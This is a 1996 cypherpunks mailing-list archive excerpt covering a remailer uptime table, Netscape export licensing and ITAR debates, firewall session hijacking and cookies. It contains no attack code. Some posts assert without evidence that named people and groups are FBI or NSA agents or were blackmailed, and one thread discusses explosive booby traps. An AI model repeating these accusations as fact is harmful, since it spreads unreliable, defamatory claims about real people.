usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 22 Jul 96 6:49:22 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
jam      remailer@cypherpunks.ca          ***-**+*****    17:17  99.99%
replay   remailer@replay.com              ***+****+***     6:16  99.98%
alumni   hal@alumni.caltech.edu           *##+*+#*####     2:13  99.98%
nymrod   nymrod@nym.jpunix.com            +##++#*#####     2:54  99.98%
lead     mix@zifi.genetics.utah.edu       +++-++++++++    39:07  99.90%
portal   hfinney@shell.portal.com         +##+**######     1:56  99.87%
amnesia  amnesia@chardos.connix.com       ----------+   2:57:13  99.84%
alpha    alias@alpha.c2.org               +**-+ .-+*++  5:10:18  99.75%
c2       remail@c2.org                    +++-+ .-+++*  5:36:10  99.57%
vegas    remailer@vegas.gateway.com       * * *-**#*#*    22:44  99.39%
extropia remail@miron.vip.best.com        ____.------  18:58:11  99.29%
mix      mixmaster@remail.obscura.com     ++--+-+---+   1:53:12  99.26%
treehole remailer@mockingbird.alias.net   -.--+ --+--   4:28:09  98.80%
penet    anon@anon.penet.fi               ---+-------  11:01:15  98.58%
haystack haystack@holy.cow.net              # *# +##+#     9:28  97.42%
ncognito ncognito@rigel.cyberpass.net     --._--+-.-   13:38:58  97.03%
lucifer  lucifer@dhp.com                  -++-++++  ++    47:19  89.37%
nemesis  remailer@meaning.com             +      *****    34:32  86.49%
flame    remailer@flame.alias.net         -.-----       4:18:14  52.45%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@vplus.com (Dan Weinstein)
Date: Mon, 22 Jul 1996 17:24:09 +0800
To: Steven L Baur <steve@miranova.com>
Subject: Re: Netscape 3.0B US version MD5 (was: Re: overseas PGPfone and Netscape)
In-Reply-To: <4slmrl$a80@abraham.cs.berkeley.edu>
Message-ID: <31f32504.18694594@mail.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 21 Jul 1996 12:05:34 -0700, Steven L Baur <steve@miranova.com>
wrote:

>>>>>> "Jeff" == Jeff Weinstein <jsw@netscape.com> writes:
>
>Jeff>   Well yes, the first time they do it.  But the many times they
>Jeff> download new versions, from now until the end of time, they can
>                                            ^^^^^^^^^^^^^^^
>Jeff> use 128-bit SSL.
>
>The world is ending September 17, 1996 I presume?  ;-)
>
Traditionally you can use an expired beta to connect to Netscape and
download a new version.  I would test this, but it wouldn't work
because the clock on the downloading machine has to be in sink with
the server.

Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@vplus.com (Dan Weinstein)
Date: Mon, 22 Jul 1996 18:33:55 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Netscape
In-Reply-To: <199607210113.SAA05824@mail.pacifier.com>
Message-ID: <31f32fcb.2406362@mail.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Jul 1996 18:13:45 -0800, jim bell <jimbell@pacifier.com>
wrote:

>At 03:27 PM 7/20/96 -0700, Tom Weinstein wrote:
>
>>> Do you Seriously Believe that Netscape would prefer foreigners
>>> to develop and use competing products? Of course not. They are
>>> probably secretly applauding the brave exporters.
>>
>>You are wrong.  We are worried that our permission to provide these
>>products will be withdrawn. 
>
>As far as I can tell, you need no "permission" to "provide these products", 
>at least domestically.  The only restrictions that have been implied have 
>been over the delivery of encryption over the 'net, and even that is 
>questionable.
>

Then you need to read the license agreement:

1. Netscape Communications Corporation ("Netscape") grants to you a
non-exclusive, non-sublicensable, license to use this Beta version of
the Netscape network navigator (the "Software"), in binary executable
form for evaluation and trial use purposes only.  THIS SOFTWARE
CONTAINS CODE THAT DISABLES MOST OF ITS FEATURES AFTER SEPTEMBER 17,
1996.

5. Title, ownership rights, and intellectual property rights in and to
the Software shall remain in Netscape and/or its suppliers.  You agree
to abide by the copyright law and all other applicable laws of the
United States including, but not limited to, export control laws.  You
acknowledge that the Software in source code form remains a
confidential trade secret of Netscape and/or its suppliers and
therefore you agree not to modify the Software or attempt to decipher,
decompile, disassemble or reverse engineer the Software, except to the
extent applicable laws specifically prohibit such restriction.

6. Netscape may terminate this License at any time by delivering
notice
to you and you may terminate this License at any time by destroying or
erasing your copy of the Software.  Upon termination of this License,
or in any event within thirty (30) days following Netscape's release
of
a commercial version of the Software, you agree to destroy or erase
the
Software.  In the event of termination, the following sections of this
License will survive: 2, 3, 4, 5, 6, 7 and 8.  This License is
personal
to you and you agree not to assign your rights herein.  This License
shall be governed by and construed in accordance with the laws of the
State of California and, as to matters affecting copyrights,
trademarks
and patents, by U.S.  federal law.  This License sets forth the entire
agreement between you and Netscape.

8. You may not download or otherwise export or reexport the Software
or
any underlying information or technology except in full compliance
with
all United States and other applicable laws and regulations.  In
particular, but without limitation, none of the Software or underlying
information or technology may be downloaded or otherwise exported or
reexported (i) into (or to a national or resident of) Cuba, Haiti,
Iraq, Libya, Yugoslavia, North Korea, Iran, or Syria or (ii) to anyone
on the US Treasury Department's list of Specially Designated Nationals
or the US Commerce Department's Table of Deny Orders.  By downloading
the Software, you are agreeing to the foregoing and you are
representing and warranting that you are not located in, under control
of, or a national or resident of any such country or on any such list.


Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 22 Jul 1996 17:26:39 +0800
To: cypherpunks@toad.com
Subject: Re: NSA Lawyers Believe ITARs Would be Overturned if Tested in	  Court
Message-ID: <ae18719604021004fdb1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:32 AM 7/22/96, jim bell wrote:
>At 02:25 AM 7/22/96 -0700, Timothy C. May wrote:
>
>>(Not all of them, presumably. Shipment of hardware ("arms") would likely
>>not be affected. But the ITARs that stop the spread of knowledge, published
>>papers, and speech (such as speaking where a foreigner can hear!) would
>>likely be overturned.)
>>--Tim May
>
>Which raises an interesting question:  Why aren't they (still) restricting
>PC-type computers for export?  While it might not appear to make a great
>deal of sense either, a PC is just as much a tool for encryption as the
>software which runs on it.  And it's obvious that given the two scenarios
>below:

But they _are_ (so far as I know, though I haven't checked recently).

That is, there are export restrictions on computers and programs which can
perform certain mathematical operations faster than some specfied limit.
For example, FFTs faster than a certain rate.

My copy of Mathematica, updated less than 18 months ago, says "Not for
Export," and this was not because it contained any crypto code, but because
of the performance on certain algorithms (on commonly available machines).

COCOM-type restrictions were relaxed several years ago, of course.

And a lot of the old COCOM restrictions were not on export per se, but on
export to specific countries. Including by transshipment
("CPU-laundering").

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 22 Jul 1996 23:47:06 +0800
To: cypherpunks@toad.com
Subject: Re: the VTW---FBI Connection
In-Reply-To: <Pine.GUL.3.94.960721225734.4827A-100000@Networking.Stanford.EDU>
Message-ID: <XPugRD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <rich@c2.org> writes:
> On Sun, 21 Jul 1996, Anonymous wrote:
>
> > III) On a tip from a "friend" we learned that the power leader behind VTW
> > is a cleancut man with the unusual name "Shabbir M. Safdar." Not exactly
> > a common name. Several people say they've met him. Our "friend" says
> > that Mr. Safdar is in reality an agent of the FBI.
>
> Damn, he's onto us. Special Agent Allbery, your cover is blown.

So, Russ is a stool pigeon?  That figures...

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 23 Jul 1996 02:09:34 +0800
To: cypherpunks@toad.com
Subject: Re: VTWW
In-Reply-To: <2.2.32.19960722054745.00718700@vertexgroup.com>
Message-ID: <VsugRD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jfricker@vertexgroup.com (John F. Fricker) writes:

> Any of you New Yorkers know the Society for Electronic Access (SEA)?

Yes. Plug-pulling censorous lying motherfuckers.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Tue, 23 Jul 1996 01:15:49 +0800
To: vin@shore.net (Vin McLellan)
Subject: Re: Firewall Penetration
Message-ID: <9607221207.AA14558@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:09 PM 7/21/96 -0400, you wrote:

>Frank Willoughby <frankw@in.net> wrote:
>
>>FWIW, of @70 firwalls on the market, only @5 are adequate to protect
>>a company from the hazards of the Internet.
>
>        Ah, Frank,  are you talking here about session hijacking and is
>end-to-end crypto the defining factor of the robust five?

Of course (Vin already knew the answer).  8^)  

To answer the other questions posed on this list, the vendors who are
relatively immune to the above attacks AND are Application Gateway type
firewalls are: (in alphabetical order):

 Digital's Firewall for Unix - *IF* the IP Encryption Tunnel is also used
 Raptor's Eagle
 Technologics' firewall (This is a stretch.  They claim they have encryption,
        but I'm not wild about the implementation) 1/2 a point
 TIS Gauntlet
 V-One's SmartWall

Interestingly enough, the reason the 5 are so robust is that they employ 
user->firewall encryption to help prevent session hijacking attacks.
FWIW, session hijacking isn't a theoretical attack.  It is a serious 
threat and (sadly) it's as simple as "point & click".

Another plus for good crypto - it not only helps protect the privacy
of data, it also helps prevent some types of hacking attacks.

Anyone can do firewall->firewall encryption (and most serious vendors 
do).  The hard part is getting the user->firewall encryption part to 
work well.  Again, as stated in my previous mail, my company doesn't 
sell firewalls, so I can call things the way I see them.

As the above list will probably draw the flames of firewall vendors 
who feel insulted that they aren't part of the list, I think it would 
be best to move this topic over to the firewalls mailing list (where 
it really belongs).  See you there.


>        Suerte,
>                        _Vin
>
>         Vin McLellan +The Privacy Guild+ <vin@shore.net>
>      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
>                         <*><*><*><*><*><*><*><*><*>

Best Regards,


Frank
Any sufficiently advanced bug is indistinguishable from a feature.
	-- Rich Kulawiec

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc. - Information Security Consulting 
http://www.fortified.com     Phone: (317) 573-0800     FAX: (317) 573-0817     
Home of the Free Internet Firewall Evaluation Checklist







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 23 Jul 1996 10:26:11 +0800
To: djw@vplus.com
Subject: Re: Netscape
Message-ID: <199607221538.IAA22007@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:41 AM 7/22/96 GMT, Dan Weinstein wrote:
>On Sat, 20 Jul 1996 18:13:45 -0800, jim bell <jimbell@pacifier.com>
>wrote:
>
>>At 03:27 PM 7/20/96 -0700, Tom Weinstein wrote:
>>
>>>> Do you Seriously Believe that Netscape would prefer foreigners
>>>> to develop and use competing products? Of course not. They are
>>>> probably secretly applauding the brave exporters.
>>>
>>>You are wrong.  We are worried that our permission to provide these
>>>products will be withdrawn. 
>>
>>As far as I can tell, you need no "permission" to "provide these products", 
>>at least domestically.  The only restrictions that have been implied have 
>>been over the delivery of encryption over the 'net, and even that is 
>>questionable.
>>
>
>Then you need to read the license agreement:
>
>1. Netscape Communications Corporation ("Netscape") grants to you a
>non-exclusive, non-sublicensable, license to use this Beta version of
>the Netscape network navigator (the "Software"), in binary executable
>form for evaluation and trial use purposes only.  THIS SOFTWARE
>CONTAINS CODE THAT DISABLES MOST OF ITS FEATURES AFTER SEPTEMBER 17,
>1996.

I don't know why you're quoting your own licensing agreement to me.  When I 
said, "you need no permission to provide these products," by "you" I was 
referring to your company, Netscape.  As in, you don't need the NSA's 
permission to write and sell good crypto domestically, even if (arguably) 
they can limit export.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 23 Jul 1996 01:40:00 +0800
To: cypherpunks@toad.com
Subject: Re: SHI_fty
In-Reply-To: <199607221141.LAA27399@pipe4.t2.usa.pipeline.com>
Message-ID: <P0wgRD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jya@pipeline.com (John Young) writes:

>    "Microsoft Sees A Major Shift For Computers." John Markoff
>
>       MS is preparing to release new software that would bring
>       the most fundamental change to personal computers since
>       the machines were invented in the 1970's.

You mean, Microsoft Bob? I saw MS Bob on clearance at the Wiz on 86th st...
$15/copy, not moving.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Tue, 23 Jul 1996 03:32:56 +0800
To: "'cypherpunks@toad.com>
Subject: RE: INFO: Submit your testimony to Congress for hearings on July 25!
Message-ID: <01BB77AE.C8574D00@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain




Simon Spero says:
"paranoid rants have their place; however, if they keep bursting into 
cypherpunks without knocking first, there could be an accident.

Lithium.... it's not just for watch batteries anymore."

Seems to apply here, no?



----------
From: 	initialization[SMTP:initialization@nemesis.meaning.com]
Sent: 	Sunday, July 21, 1996 6:23 PM
To: 	cypherpunks@toad.com
Subject: 	Re: INFO: Submit your testimony to Congress for hearings on July 25! 

vtw@vtw.org writes:
> UPCOMING HEARING INFORMATION
http://www.crypto.com/events/ after that.
... etc etc etc etc

> 

This is an amazing time for Big Brother, who, in the person of VTW,
is gathering the names and addresses of all who oppose it, one by one,
under the Rube of "testimony" and "democracy"?

What do you think will happen next? You think Big Brother is going to hear
what you say and say "oh my god they are right!" and then turn around
and mend its ways? NO! You will be marked as a trouble maker in your file,
and rounded up or worse, when the time comes!

They have duped many into participating, and others, prominent ones like
Blaze, Diffie, Schneier, Zimmermann, have been blackmailed into working
for them.

Turn your back on this sham "democracy". Fuck their "hearings". And demand
truth from "VTW". VTW=NSA+FBI front.



















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William Ehrendreich" <bille@metro.net>
Date: Tue, 23 Jul 1996 02:39:36 +0800
To: "Adam Shostack" <adam@homeport.org>
Subject: Re: Length of passphrase beneficial?
Message-ID: <14414635309058@metro.net>
MIME-Version: 1.0
Content-Type: text/plain




> 	I disagreed with that assesment.  Breaking into a home is easy.
> 
> Adam
> 
> 
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."

Yes and ultimately more obvious. There are about 10 zillion ways that
someone could hide a pass phrase. Bits are bits. Under the assumption that
breaking into a home may be easy, you have to look at the possibility that
this is what the person is looking for. You know, "Big brother broke into
my house to subvert my freedoms", ploy. What a great way to get your self
on Date Line.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Derbes <acd@artemis.arc.nasa.gov>
Date: Tue, 23 Jul 1996 04:42:35 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: [Noise] Re: <rant> Re: Devil's Bargain
In-Reply-To: <Pine.LNX.3.93.960722022330.331B-100000@smoke.suba.com>
Message-ID: <Pine.SGI.3.91.960722095424.5549D-100000@mother.arc.nasa.gov>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 Jul 1996, snow wrote:

> On 22 Jul 1996, Roger Williams wrote:
> > >>>>> "CCP" == snow  <snow@smoke.suba.com> writes:
> >   >      Am I the only one in this country who, when hearing about TWA
> >   > f800 shrugged his shoulders and thought (or said) "Time flies and
> >   > aeroplanes crash" (Name the band and album and I'll be impressed)?
> > Umm, isn't that "Time flies *but* aeroplanes crash"?
> 
>     Don't think so. I'll check in the morning. The wife doesn't like 
> British HardCore at 3a.m. Silly girl. 
> 
> > Subhumans (the Brits).  12" EP of the same name.  Bluurg records.
> 
>      I have it on 29:29 Split Vision. Good stuff. 
> 
> > But, yes, my vague impression is that there is more press coverage
> > (I get all my news from Auntie Beeb, who hasn't been as vociferous
> > about it.)  But to most insular American types, terrorism is still a
> > novelty.
> > BTW, I wouldn't say that officials discounted terrorism -- you can bet
> > Kallstrom is sure hoping that this isn't "just an accident"!
> 
>      Thing is, this crash was getting more attention than valuejet from the 
> get go. Before there was any HINT of anything more that your typical 
> gravity check plane crash it was all over the news.

Well,

	There were no signs of mecahnical faliure, the plane took off one 
hour late, that means if it was a timed bomb the plane would have gone 
down over oh lets say random VERY VERY deep place in the atlantic ocean.  
The plane was an easy shop for all sorts of shoulder launched SAM's.  
There is a hell of alot of terrorist activity right now, and the 
olympics, I think there is good circumstantial evidance to suggest 
terrorist activty just from motives and oppertunity.


my half a cent...


Alex Derbes

> 
> Petro, Christopher C.
> petro@suba.com <prefered for any non-list stuff>
> snow@smoke.suba.com
> 

----------
"It's not the Zen way, but it gets the job done." --Garrison Keiler
----------
Alex Derbes - 504-944-7484 - 504-525-4776   
email://acd@artemis.arc.nasa.gov - acd@webnetmktg.com - acd@po.cwru.edu
finger for PGP or MIT PGP serv  - finger://acd@redwood.webnetmktg.com
http://www.cwru.edu/cgi-bin/random.pl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Tue, 23 Jul 1996 09:30:28 +0800
To: cypherpunks@toad.com
Subject: Re: SHI_fty
Message-ID: <2.2.32.19960722165903.00bef0e8@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:45 AM 7/22/96 EDT, you wrote:
>jya@pipeline.com (John Young) writes:
>
>>    "Microsoft Sees A Major Shift For Computers." John Markoff
>>
>>       MS is preparing to release new software that would bring
>>       the most fundamental change to personal computers since
>>       the machines were invented in the 1970's.
>
>You mean, Microsoft Bob? I saw MS Bob on clearance at the Wiz on 86th st...
>$15/copy, not moving.
>

hahaahahaha

Actually they are referring to IE4 aka Detroit technology.

That's all. "Major Shift" cause the browser is an ole container. Not exactly
earth shattering but that's good PR for ya.

--j






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Ross <davros@pack.raf.com>
Date: Tue, 23 Jul 1996 09:41:32 +0800
To: erichill@netcomlcom.raf.com
Subject: No Subject
Message-ID: <Pine.LNX.3.90.960722101326.25828D-100000@pack>
MIME-Version: 1.0
Content-Type: text/plain


RAF does not work in this area.  If any of you are interested (I have no 
idea what this is about), please feel free to say I suggested you contact 
her.

-dave ross
davros@raf.com

---------- Forwarded message ----------
Date: Sun, 21 Jul 1996 14:20:06 -0700 (PDT)
From: June Peoples <june@dang>
To: davros@raf.com

dave, someone called me with a request last week for people who have a 
good background in internet security, "firewalls" and encryption etc.  I 
thought Jim Bennett and perhaps some of your other contacts would work.

Could you e-mail Jim's phone and e-mail to

Sandra Huie (Jonathon's wife) at shuie@masterteam.com

Thanks, JP





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 23 Jul 1996 02:13:56 +0800
To: trei@process.com
Subject: Re: Borders *are* transparent
Message-ID: <199607221420.HAA00786@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff wrote:

>   The retail version of Netscape Navigator sold in US stores
> has been the US version for almost a year now.  The first run
> were the export version, because the marketing people thought
> it would be easier.  When I explained the issue, they made the
> change to the stronger US version immediately.
> 	--Jeff

This, I think, is one place where the activities of members of this list
have had a real effect. Last September, three or four semi-overlapping
efforts succeeded in brute-forcing 40 bit RC4 (used in export-quality SSL).

This had three main effects:

1. Raising the issue in the media, and thus in the public consciousness.

2. Within a month, the government was starting to talk about permitting the
export of stronger (but GAK'd) encryption products.

3.  It enabled people like Jeff to argue successfully that releasing only an 
export-strength product was no longer a viable option.In practical terms
is probably the most important effect of the crack: I know of at least one other
company where it led directly to the release of both domestic and export 
versions.

Any one up for a distributed brute force attack on single DES? My 
back-of-the-envelope calculations and guesstimates put this on the
hairy edge of doability (the critical factor is how many machines can
be recruited - a non-trivial cash prize would help). 

Peter Trei
trei@process.com

"Exportable strong encryption" is an oxymoron.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Tue, 23 Jul 1996 10:12:52 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <v03007602ae19799867d7@[204.179.128.64]>
MIME-Version: 1.0
Content-Type: text/plain


>   You pop a claymore in a building with any substance up to the level of
>concrete re-enforced, and you _will_ be going with them.

booby traping your home is a really stupid idea, I promise that your
dog/child/spouse will be theone to accidentally set it off. besides for
this you can get sued..

every hear the one about the case of a guy who constantly had his radar
detector stolen out his his car, he decides to set a trap and rigs his next
one with exposive. The perp steals the box, sells it. someclown powers it
up on his dash board and BANG!.. well you'd figure justice is served, but
the NYC judges awarded the mass of flesh damages and charged the guy with
manslaughter.

only in Amerika..





Vinnie Moscaritolo
"Law - Samoan Style"
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 23 Jul 1996 02:32:51 +0800
To: "Clay Olbon II" <cypherpunks@toad.com
Subject: Re: Symantec's Your Eyes Only
Message-ID: <2.2.32.19960722143749.00843078@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:17 AM 7/18/96 -0400, Clay Olbon II wrote:

>My point was not that govts want to escrow communication keys, it was that
>this is appearing more and more in commercial products marketed to
>businesses.  I run the computer system for a small office and I would
>rather not see employee email - maybe I am just naive.  However, there
>obviously is a demand for this type of product.  It must come from either a
>lack of understanding of crypto, or a freeh-style authoritarianism on the
>part of corporate executives.  I wouldn't rule either one out.  If it is
>the latter, I'm not sure there is anything we can do.

A larger organization feels that it has to maintain control over its systems
by bureaucratic methods.  Smaller organizations can figure out by direct
experience whether someone is trustworthy or not.

This is not restricted to encryption software, however.  Large organizations
attempt to determine what their employees should be doing with their time as
well.  This method of social organization works fine when mass producing
large quantities of identical physical products.  It is, however,
incompatible with small-run, custom production of goods and services in
which individual imagination and knowledge play a big part.  In the current
environment, management can't predict in advance what is the optimal thing
that the "workers" should be doing at any given time.

What we call "forcing contracts" (you do this, I pay you) are replaced in
the modern age with "incentive contracts"  (you produce a desired outcome, I
pay you).  This means that as time goes on many businesses approach closer
and closer to the one-man firm model in which everyone buys and sells
everyone else's services on the spot market.  This didn't work in the past
because of the friction of the transaction costs involved but those costs
have declined dramatically.  In this environment, others don't care how much
time you surf the web or what you encrypt as long as your output is of the
desired quality and quantity.

Indeed, the average firm size has been declining in the US for 15 years or
so.  Companies may attempt to resist this dissolution and they may attempt
to maintain traditional controls on their workers but if it is true that the
Nets make it possible for the greater efficiencies of the one-man firm (no
downtime paid by the buyer) to come into play, new small firms will eat the
dinosaurs.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 23 Jul 1996 02:15:18 +0800
To: cypherpunks@toad.com
Subject: Cookie Monster on a Diet
Message-ID: <2.2.32.19960722143754.0084a5bc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


I love telling Netscape to inform me before it accepts cookies.  It's fun
seeing who asks and whether they'll let you in The WSJ site won't let you in
if you don't accept 2 cookies from it.  It looks like they are an encrypted
version of your username and password.

Maybe Netscape could add a protocol which would let your instance of
Netscape tell the server that you are on a diet and the Doctor told you not
to accept any cookies.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 23 Jul 1996 16:54:44 +0800
To: cypherpunks@toad.com
Subject: Re: Curfews again
Message-ID: <v02120d03ae175ee1b4a4@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:14 7/20/96, Timothy C. May wrote:
>At 6:37 PM 7/20/96, Alan Olsen wrote:
>
>>I bet the "National Curfew" crap that Clinton is trying to push is not going
>>down well either.  He seems to think that the problems of a small fraction
>>of the country apply to the whole country...  (But it makes for good sound
>>bites.)

What National Curfew? Haven't watched the news all week. Did I miss something?

TIA,


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 23 Jul 1996 08:02:36 +0800
To: Tom Weinstein <cypherpunks@toad.com
Subject: Re: Netscape
Message-ID: <v02120d04ae1763d7df01@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:27 7/20/96, Tom Weinstein wrote:
[Site distributing Netscape US elided. Thanks Alex. There was no wait.]

>Why not consider what the consequences will be?  Do you seriously
>believe that this will make the government stop enforcing ITAR?  Do you
>believe it will make them change the law?  No.  What it will do is make
>them remove our permission to distribute this stuff.

I doubt that. PGP has been distributed for years with less safeguards than
Netscape. It is available on more free-world sites than Netscape US. This
did not prompt the powers that be to force MIT to take down their site. The
feds know that it is impossible to prevent software that is available on
the net from being exported. Why would they harass Netscape once the
inevitable happens?



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 23 Jul 1996 14:46:18 +0800
To: iang@cs.berkeley.edu>
Subject: Re: Netscape 3.0B US version MD5 (was: Re: overseas PGPfone and Netscape)
Message-ID: <v02120d05ae176605622b@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:48 7/20/96, Jeff Weinstein wrote:
[...]
>> But assumedly if they're downloading the 128-bit netscape, then they're
>> only using the 40-bit version to do it... :-)
>
>  Well yes, the first time they do it.  But the many times they download
>new versions, from now until the end of time, they can use 128-bit SSL.

Not so fast. Win 32 Netscape 3.0b5 freezes my machine :-)



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 23 Jul 1996 18:31:59 +0800
To: ante <cypherpunks@toad.com
Subject: Re: evidence from the NIC - interpret and use as you will.
Message-ID: <v02120d0cae18c52211c7@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:53 7/21/96, ante wrote:
>See who is sleeping with who. These are the supporters of the sham
>"hearings".
[list of freedom of speech supporters elided]

There is help. Really. Today's psychiatric drugs can help make the
difference. Please see a qualified psychiatrist.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 23 Jul 1996 09:54:13 +0800
To: sandfort@crl.com (Sandy Sandfort)
